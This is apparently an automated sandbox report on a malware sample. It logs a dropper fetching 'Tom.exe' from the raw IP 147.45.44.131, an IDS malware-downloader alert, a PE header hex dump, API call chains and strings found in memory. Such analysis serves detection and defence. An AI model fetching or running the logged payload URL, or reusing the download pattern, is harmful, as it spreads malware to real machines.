Source:	Binary string: wntdll.pdbUGP source: thunderbird.exe, 00000008.00000002.2460817581.0000000004500000.00000004.00000800.00020000.00000000.sdmp, thunderbird.exe, 00000008.00000002.2460307129.00000000041A9000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2636596429.00000000041C3000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2636744195.0000000004520000.00000004.00000800.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2636909160.00000000048D2000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.2919742009.0000000004FC4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.2920632911.00000000058B0000.00000004.00001000.00020000.00000000.sdmp, thunderbird.exe, 00000010.00000002.2990472839.0000000004510000.00000004.00000800.00020000.00000000.sdmp, thunderbird.exe, 00000010.00000002.2990659694.00000000048C5000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000010.00000002.2990329847.00000000041B9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.3342995119.00000000055F0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdbUGP source: Qjsync.exe, 00000011.00000002.3022572775.0000000003CB6000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000002.3028506942.0000000005EBB000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000002.3024927145.00000000052B0000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000002.3023518128.00000000046B7000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000002.3029133169.00000000064B1000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000002.3023737831.00000000048BD000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000002.3022953947.00000000040B3000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000002.3021471019.0000000002BE0000.00000004.00001000.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000002.3020860602.0000000002255000.00000004.00000020.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000002.3029759154.00000000068B0000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000002.3030087680.0000000006ABA000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: thunderbird.exe, 00000008.00000002.2460817581.0000000004500000.00000004.00000800.00020000.00000000.sdmp, thunderbird.exe, 00000008.00000002.2460307129.00000000041A9000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2636596429.00000000041C3000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2636744195.0000000004520000.00000004.00000800.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2636909160.00000000048D2000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.2919742009.0000000004FC4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.2920632911.00000000058B0000.00000004.00001000.00020000.00000000.sdmp, thunderbird.exe, 00000010.00000002.2990472839.0000000004510000.00000004.00000800.00020000.00000000.sdmp, thunderbird.exe, 00000010.00000002.2990659694.00000000048C5000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000010.00000002.2990329847.00000000041B9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.3342995119.00000000055F0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: e:\builds\tinderbox\Tb-Mozilla1.8-Release\WINNT_5.0_Depend\mozilla\mail\app\thunderbird.pdb source: thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: e:\builds\tinderbox\Tb-Mozilla1.8-Release\WINNT_5.0_Depend\mozilla\nss\softokn\softokn3.pdb source: thunderbird.exe, 00000008.00000003.2452341930.0000000003143000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: e:\builds\tinderbox\Tb-Mozilla1.8-Release\WINNT_5.0_Depend\mozilla\nss\nss\nss3.pdb source: thunderbird.exe, 00000008.00000003.2451905011.0000000003143000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: e:\builds\tinderbox\Tb-Mozilla1.8-Release\WINNT_5.0_Depend\mozilla\nsprpub\pr\src\nspr4.pdb source: thunderbird.exe, 00000008.00000003.2451777939.0000000003143000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Windows\Temp\AppsLo.exe	Code function: 6_2_008A3CC4 GetFileAttributesW,GetLastError,GetLastError,SetFileAttributesW,GetLastError,GetTempPathW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetTempFileNameW,MoveFileExW,MoveFileExW,MoveFileExW,FindNextFileW,GetLastError,GetLastError,GetLastError,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose,	6_2_008A3CC4
Source: C:\Windows\Temp\AppsLo.exe	Code function: 6_2_008E4440 FindFirstFileW,FindClose,	6_2_008E4440
Source: C:\Windows\Temp\AppsLo.exe	Code function: 6_2_008D7B87 FindFirstFileExW,	6_2_008D7B87
Source: C:\Windows\Temp\AppsLo.exe	Code function: 6_2_008B9B43 FindFirstFileW,lstrlenW,FindNextFileW,FindClose,	6_2_008B9B43
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Code function: 7_2_00F94440 FindFirstFileW,FindClose,	7_2_00F94440
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Code function: 7_2_00F87B87 FindFirstFileExW,	7_2_00F87B87
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Code function: 7_2_00F69B43 FindFirstFileW,lstrlenW,FindNextFileW,FindClose,	7_2_00F69B43
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Code function: 7_2_00F53CC4 GetFileAttributesW,GetLastError,GetLastError,SetFileAttributesW,GetLastError,GetTempPathW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetTempFileNameW,MoveFileExW,MoveFileExW,MoveFileExW,FindNextFileW,GetLastError,GetLastError,GetLastError,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose,	7_2_00F53CC4

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 05 Dec 2024 10:39:59 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Thu, 28 Nov 2024 17:38:25 GMTETag: "a409ed-627fc8caf54eb"Accept-Ranges: bytesContent-Length: 10750445Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 41 21 11 53 05 40 7f 00 05 40 7f 00 05 40 7f 00 b1 dc 8e 00 0c 40 7f 00 b1 dc 8c 00 79 40 7f 00 b1 dc 8d 00 1d 40 7f 00 dc 22 7c 01 16 40 7f 00 dc 22 7b 01 16 40 7f 00 dc 22 7a 01 23 40 7f 00 0c 38 fc 00 00 40 7f 00 0c 38 ec 00 14 40 7f 00 05 40 7e 00 50 41 7f 00 a1 23 7a 01 4e 40 7f 00 a1 23 80 00 04 40 7f 00 05 40 e8 00 07 40 7f 00 a1 23 7d 01 04 40 7f 00 52 69 63 68 05 40 7f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 86 ad 10 5a 00 00 00 00 00 00 00 00 e0 00 02 0d 0b 01 0e 0b 00 9a 04 00 00 74 02 00 00 00 00 00 a6 e2 02 00 00 10 00 00 00 b0 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 50 07 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b4 86 06 00 b4 00 00 00 00 d0 06 00 1c 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 07 00 fc 3d 00 00 50 76 06 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a4 76 06 00 18 00 00 00 30 70 06 00 40 00 00 00 00 00 00 00 00 00 00 00 00 b0 04 00 e0 03 00 00 34 82 06 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 37 99 04 00 00 10 00 00 00 9a 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 60 ed 01 00 00 b0 04 00 00 ee 01 00 00 9e 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 30 17 00 00 00 a0 06 00 00 0a 00 00 00 8c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 77 69 78 62 75 72 6e 38 00 00 00 00 c0 06 00 00 02 00 00 00 96 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 1c 3a 00 00 00 d0 06 00 00 3c 00 00 00 98 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 fc 3d 00 00 00 10 07 00 00 3e 00 00 00 d4 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic	HTTP traffic detected: GET /electron-desktop/windows/production/binance-setup.exe HTTP/1.1Host: download.binance.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /infopage/Tom.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqHost: 147.45.44.131Connection: Keep-Alive

Source: Joe Sandbox View

IP Address: 147.45.44.131 147.45.44.131

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: Network traffic

Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.6:49708 -> 147.45.44.131:80

Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131

Source: global traffic	HTTP traffic detected: GET /electron-desktop/windows/production/binance-setup.exe HTTP/1.1Host: download.binance.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /infopage/Tom.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqHost: 147.45.44.131Connection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: download.binance.com
Source: global traffic	DNS traffic detected: DNS query: amenstilo.website

Source: MiJZ3z4t5K.exe, 00000000.00000002.3344787379.0000000003171000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.131
Source: MiJZ3z4t5K.exe, 00000000.00000002.3344787379.0000000003171000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.131/infopage/Tom.exe
Source: AppsLo.exe	String found in binary or memory: http://appsyndication.org/2006/appsyn
Source: AppsLo.exe, 00000006.00000000.2322329895.00000000008EB000.00000002.00000001.01000000.00000008.sdmp, AppsLo.exe, 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmp, AppsLo.exe, 00000007.00000002.2464442789.0000000000F9B000.00000002.00000001.01000000.0000000A.sdmp, AppsLo.exe, 00000007.00000000.2326342375.0000000000F9B000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://appsyndication.org/2006/appsynapplicationapuputil.cppupgradeexclusivetrueenclosuredigestalgor
Source: thunderbird.exe, 00000008.00000002.2459567914.0000000003C5F000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2636199629.0000000003C82000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.2920093047.000000000536C000.00000004.00000800.00020000.00000000.sdmp, thunderbird.exe, 00000010.00000002.2989949247.0000000003C71000.00000004.00000020.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000002.3021047369.00000000026A0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
Source: thunderbird.exe, 00000008.00000002.2459567914.0000000003C5F000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2636199629.0000000003C82000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.2920093047.000000000536C000.00000004.00000800.00020000.00000000.sdmp, thunderbird.exe, 00000010.00000002.2989949247.0000000003C71000.00000004.00000020.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000002.3021047369.00000000026A0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
Source: thunderbird.exe, 00000008.00000002.2459567914.0000000003C5F000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2636199629.0000000003C82000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.2920093047.000000000536C000.00000004.00000800.00020000.00000000.sdmp, thunderbird.exe, 00000010.00000002.2989949247.0000000003C71000.00000004.00000020.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000002.3021047369.00000000026A0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: thunderbird.exe, 00000008.00000002.2459567914.0000000003C5F000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2636199629.0000000003C82000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.2920093047.000000000536C000.00000004.00000800.00020000.00000000.sdmp, thunderbird.exe, 00000010.00000002.2989949247.0000000003C71000.00000004.00000020.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000002.3021047369.00000000026A0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: cmd.exe, 0000000B.00000002.2920093047.000000000536C000.00000004.00000800.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000002.3021047369.00000000026A0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: cmd.exe, 0000000B.00000002.2920093047.000000000536C000.00000004.00000800.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000002.3021047369.00000000026A0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
Source: cmd.exe, 0000000B.00000002.2920093047.000000000536C000.00000004.00000800.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000002.3021047369.00000000026A0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
Source: cmd.exe, 0000000B.00000002.2920093047.000000000536C000.00000004.00000800.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000002.3021047369.00000000026A0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: thunderbird.exe, 00000008.00000003.2452098202.0000000003142000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000008.00000003.2451777939.0000000003143000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000008.00000003.2451244929.0000000003143000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000008.00000003.2452498639.0000000003143000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000008.00000003.2451905011.0000000003143000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000008.00000003.2452218692.0000000003143000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.thawte.com/ThawteCodeSigningCA.crl02
Source: thunderbird.exe, 00000008.00000003.2452098202.0000000003142000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000008.00000003.2451777939.0000000003143000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000008.00000003.2451244929.0000000003143000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000008.00000003.2452498639.0000000003143000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000008.00000003.2451905011.0000000003143000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000008.00000003.2452218692.0000000003143000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.thawte.com/ThawtePremiumServerCA.crl0
Source: thunderbird.exe, 00000008.00000002.2459567914.0000000003C5F000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2636199629.0000000003C82000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.2920093047.000000000536C000.00000004.00000800.00020000.00000000.sdmp, thunderbird.exe, 00000010.00000002.2989949247.0000000003C71000.00000004.00000020.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000002.3021047369.00000000026A0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
Source: thunderbird.exe, 00000008.00000002.2459567914.0000000003C5F000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2636199629.0000000003C82000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.2920093047.000000000536C000.00000004.00000800.00020000.00000000.sdmp, thunderbird.exe, 00000010.00000002.2989949247.0000000003C71000.00000004.00000020.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000002.3021047369.00000000026A0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: thunderbird.exe, 00000008.00000002.2459567914.0000000003C5F000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2636199629.0000000003C82000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.2920093047.000000000536C000.00000004.00000800.00020000.00000000.sdmp, thunderbird.exe, 00000010.00000002.2989949247.0000000003C71000.00000004.00000020.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000002.3021047369.00000000026A0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: thunderbird.exe, 00000008.00000002.2459567914.0000000003C5F000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2636199629.0000000003C82000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.2920093047.000000000536C000.00000004.00000800.00020000.00000000.sdmp, thunderbird.exe, 00000010.00000002.2989949247.0000000003C71000.00000004.00000020.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000002.3021047369.00000000026A0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/assured-cs-g1.crl00
Source: thunderbird.exe, 00000008.00000002.2459567914.0000000003C5F000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2636199629.0000000003C82000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.2920093047.000000000536C000.00000004.00000800.00020000.00000000.sdmp, thunderbird.exe, 00000010.00000002.2989949247.0000000003C71000.00000004.00000020.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000002.3021047369.00000000026A0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: thunderbird.exe, 00000008.00000002.2459567914.0000000003C5F000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2636199629.0000000003C82000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.2920093047.000000000536C000.00000004.00000800.00020000.00000000.sdmp, thunderbird.exe, 00000010.00000002.2989949247.0000000003C71000.00000004.00000020.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000002.3021047369.00000000026A0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
Source: thunderbird.exe, 00000008.00000002.2459567914.0000000003C5F000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2636199629.0000000003C82000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.2920093047.000000000536C000.00000004.00000800.00020000.00000000.sdmp, thunderbird.exe, 00000010.00000002.2989949247.0000000003C71000.00000004.00000020.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000002.3021047369.00000000026A0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: thunderbird.exe, 00000008.00000002.2459567914.0000000003C5F000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2636199629.0000000003C82000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.2920093047.000000000536C000.00000004.00000800.00020000.00000000.sdmp, thunderbird.exe, 00000010.00000002.2989949247.0000000003C71000.00000004.00000020.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000002.3021047369.00000000026A0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: thunderbird.exe, 00000008.00000002.2459567914.0000000003C5F000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2636199629.0000000003C82000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.2920093047.000000000536C000.00000004.00000800.00020000.00000000.sdmp, thunderbird.exe, 00000010.00000002.2989949247.0000000003C71000.00000004.00000020.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000002.3021047369.00000000026A0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/assured-cs-g1.crl0L
Source: thunderbird.exe, 00000008.00000002.2459567914.0000000003C5F000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2636199629.0000000003C82000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.2920093047.000000000536C000.00000004.00000800.00020000.00000000.sdmp, thunderbird.exe, 00000010.00000002.2989949247.0000000003C71000.00000004.00000020.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000002.3021047369.00000000026A0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: svchost.exe, 0000000D.00000003.2677822907.00000202219F0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#Account
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#BiffState
Source: thunderbird.exe, 00000010.00000002.2988595385.0000000000A3C000.00000002.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#BookmarkSeparator
